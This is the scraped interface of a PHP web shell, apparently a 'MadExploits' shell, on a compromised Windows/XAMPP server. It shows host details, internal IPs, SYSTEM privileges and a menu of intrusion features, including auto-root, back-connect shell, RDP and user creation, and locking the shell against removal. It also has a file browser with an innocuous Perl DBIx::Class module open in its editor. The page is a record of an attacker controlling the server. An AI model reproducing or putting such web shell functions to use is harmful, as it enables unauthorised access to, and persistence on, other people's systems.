Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
perl /
vendor /
lib /
DBIx /
Class /
CDBICompat /
[ HOME SHELL ]
Name
Size
Permission
Action
AbstractSearch.pm
1.09
KB
-rw-rw-rw-
AccessorMapping.pm
2.01
KB
-rw-rw-rw-
AttributeAPI.pm
668
B
-rw-rw-rw-
AutoUpdate.pm
900
B
-rw-rw-rw-
ColumnCase.pm
1.98
KB
-rw-rw-rw-
ColumnGroups.pm
4.43
KB
-rw-rw-rw-
ColumnsAsHash.pm
2.57
KB
-rw-rw-rw-
Constraints.pm
1.77
KB
-rw-rw-rw-
Constructor.pm
673
B
-rw-rw-rw-
Copy.pm
1.06
KB
-rw-rw-rw-
DestroyWarning.pm
451
B
-rw-rw-rw-
GetSet.pm
639
B
-rw-rw-rw-
ImaDBI.pm
3.85
KB
-rw-rw-rw-
Iterator.pm
1.59
KB
-rw-rw-rw-
LazyLoading.pm
2.84
KB
-rw-rw-rw-
LiveObjectIndex.pm
2.48
KB
-rw-rw-rw-
NoObjectIndex.pm
1.03
KB
-rw-rw-rw-
Pager.pm
499
B
-rw-rw-rw-
ReadOnly.pm
288
B
-rw-rw-rw-
Relationship.pm
1.08
KB
-rw-rw-rw-
Relationships.pm
5.45
KB
-rw-rw-rw-
Retrieve.pm
1.94
KB
-rw-rw-rw-
SQLTransformer.pm
3.16
KB
-rw-rw-rw-
Stringify.pm
451
B
-rw-rw-rw-
TempColumns.pm
2.2
KB
-rw-rw-rw-
Triggers.pm
971
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TempColumns.pm
package # hide from PAUSE DBIx::Class::CDBICompat::TempColumns; use strict; use warnings; use base qw/Class::Data::Inheritable/; use Carp; __PACKAGE__->mk_classdata('_temp_columns' => { }); sub _add_column_group { my ($class, $group, @cols) = @_; return $class->next::method($group, @cols) unless $group eq 'TEMP'; my %new_cols = map { $_ => 1 } @cols; my %tmp_cols = %{$class->_temp_columns}; for my $existing_col ( grep $new_cols{$_}, $class->columns ) { # Already been declared TEMP next if $tmp_cols{$existing_col}; carp "Declaring column $existing_col as TEMP but it already exists"; } $class->_register_column_group($group => @cols); $class->mk_group_accessors('temp' => @cols); $class->_temp_columns({ %tmp_cols, %new_cols }); } sub new { my ($class, $attrs, @rest) = @_; my $temp = $class->_extract_temp_data($attrs); my $new = $class->next::method($attrs, @rest); $new->set_temp($_, $temp->{$_}) for keys %$temp; return $new; } sub _extract_temp_data { my($self, $data) = @_; my %temp; foreach my $key (keys %$data) { $temp{$key} = delete $data->{$key} if $self->_temp_columns->{$key}; } return \%temp; } sub find_column { my ($class, $col, @rest) = @_; return $col if $class->_temp_columns->{$col}; return $class->next::method($col, @rest); } sub set { my($self, %data) = @_; my $temp_data = $self->_extract_temp_data(\%data); $self->set_temp($_, $temp_data->{$_}) for keys %$temp_data; return $self->next::method(%data); } sub get_temp { my ($self, $column) = @_; $self->throw_exception( "Can't fetch data as class method" ) unless ref $self; $self->throw_exception( "No such TEMP column '${column}'" ) unless $self->_temp_columns->{$column} ; return $self->{_temp_column_data}{$column} if exists $self->{_temp_column_data}{$column}; return undef; } sub set_temp { my ($self, $column, $value) = @_; $self->throw_exception( "No such TEMP column '${column}'" ) unless $self->_temp_columns->{$column}; $self->throw_exception( "set_temp called for ${column} without value" ) if @_ < 3; return $self->{_temp_column_data}{$column} = $value; } sub has_real_column { return 1 if shift->has_column(shift); } 1;
Close